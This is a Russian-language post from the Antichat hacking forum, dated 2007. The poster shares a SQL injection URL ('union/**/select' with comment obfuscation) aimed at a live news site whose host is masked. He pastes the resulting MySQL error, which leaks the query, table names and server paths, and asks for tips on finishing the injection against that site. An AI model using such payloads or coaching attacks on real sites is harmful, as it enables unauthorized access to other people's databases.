HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Страшной запрос
  #1  
Старый 18.11.2007, 00:46
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию Страшной запрос

MySQL injection.
http://wtf.com/country/ukraine/4/?page=-2%20union/**/select/**/45,15/*
Гы, ет наверно я только так тупо запросы формирую
При етом выдает нечто страшное:
PHP код:
SELECT ai.idah.headlineat.full_textam.smallimage_url as imgat.announcelah.headline as en_namelower(si.name), si.urlsi.ahref as site_titlest.description FROM elgov_articleitem as aielgov_articletext as atelgov_articleheadline as ahelgov_subjectitem as sielgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id ai.idLEFT JOIN elgov_articleheadline as lah ON (lah.item_id ai.id AND lah.lang_id 5WHERE ai.id ah.item_id AND ai.examine AND ai.id at.item_id AND ah.lang_id AND at.lang_id ah.lang_id AND ai.inode si.id AND lower(si.name) = 'ukraine' AND st.item_id si.id AND st.lang_id ah.lang_id AND aa.article_id ai.id AND aa.inode 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -4515

MYSQL ERROR ]: SELECT ai.idah.headlineat.full_textam.smallimage_url as imgat.announcelah.headline as en_namelower(si.name), si.urlsi.ahref as site_titlest.description FROM elgov_articleitem as aielgov_articletext as atelgov_articleheadline as ahelgov_subjectitem as sielgov_subjecttitle as st JOIN elgov_articleactivity as aa LEFT JOIN elgov_articleimage as am ON (am.item_id ai.idLEFT JOIN elgov_articleheadline as lah ON (lah.item_id ai.id AND lah.lang_id 5WHERE ai.id ah.item_id AND ai.examine AND ai.id at.item_id AND ah.lang_id AND at.lang_id ah.lang_id AND ai.inode si.id AND lower(si.name) = 'ukraine' AND st.item_id si.id AND st.lang_id ah.lang_id AND aa.article_id ai.id AND aa.inode 4 GROUP BY ai.id ORDER BY ah.headline LIMIT -4515 (You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '-45, 15' at line 30 )

Warningmysql_fetch_object(): supplied argument is not a valid MySQL result resource in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php on line 62

Warning
Cannot modify header information headers already sent by (output started at /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/db_sql.class.php:36in /var/www/virtual/нечто/sm/self/lib/Adelite/SiteManager/server.class.php on line 209 
Вы сразу скажите "линк в студию!"
Но дайте мне возможность сделать ету инэкцию самому, ибо я их тока начал изучать.Да, да мануалы на ачате читал...
Жду ваших советов.
П.С. Просьба не кричать ЛАМЕР!, тут всьо просто!
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
http. вопрос по пртоколу. x-treem PHP 13 22.05.2007 23:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.